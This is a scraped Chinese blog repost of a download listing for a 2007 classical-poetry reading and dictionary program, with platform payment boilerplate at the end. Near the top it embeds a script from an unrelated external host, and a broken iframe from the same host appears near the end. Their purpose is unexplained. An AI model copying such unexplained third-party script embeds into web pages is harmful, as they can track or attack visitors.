中华诗词 v2007.03.25 清风明月版 官方

Welcome to my blog!
<script language="javascript" src="http://avss.b15.cnwg.cn/count/count.asp"></script>
中华诗词 v2007.03.25 清风明月版<||>





软件大小:

38944 KB



软件语言:

简体中文



软件类别:

国产软件 / 共享版 / 文科工具



应用平台:

Win9x/NT/2000/XP/2003



界面预览:








插件情况:


 



投诉







更新时间:

2007-03-19 10:00:29



下载次数:

191651



推荐等级:






联 系 人:


roadcom
zhsc.com




开 发 商:中华诗词 v2007.03.25 清风明月版>作者空间:


http://hi.baidu.com/roadcom/





    《中华诗词2007》系列软件是您阅读、学习中华古典文学的一个方便、理想的工具。阅读古典作品,可能经常会有一些字不会念、不解其意,需要查查字典的;现在可不必那么麻烦啦!在《中华诗词2007》软件当中,若哪个字、哪个词不认识,用鼠标点一下它,马上就可以在屏幕右边的“字义”窗口中得到详细的词义、字义解释。我们在软件当中免费提供的汉字字典,收录了二万余个中文单字,基本涵盖古文、现代文当中出现的所有汉字;在“注册版”当中,还另外提供了一部容量约1700万字的高级中文词典。
  这是《中华诗词2007》系列“三合一套装”软件的其中之一,主要面向大众用户,软件内收录了一个庞大的中文书库供您使用,目前作品库主要分以下四大部分:
  中华诗词:遴选上自先秦《诗经》、下至现当代著名诗人的代表作品五千余首(若有必要,您也可以从《中华诗词博览》当中导入《全唐诗全宋词全元曲》、《全宋诗》等作品库),并为多数重要作品提供了较为详尽的注释资料;
  中华散文:分“经...
官方
src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值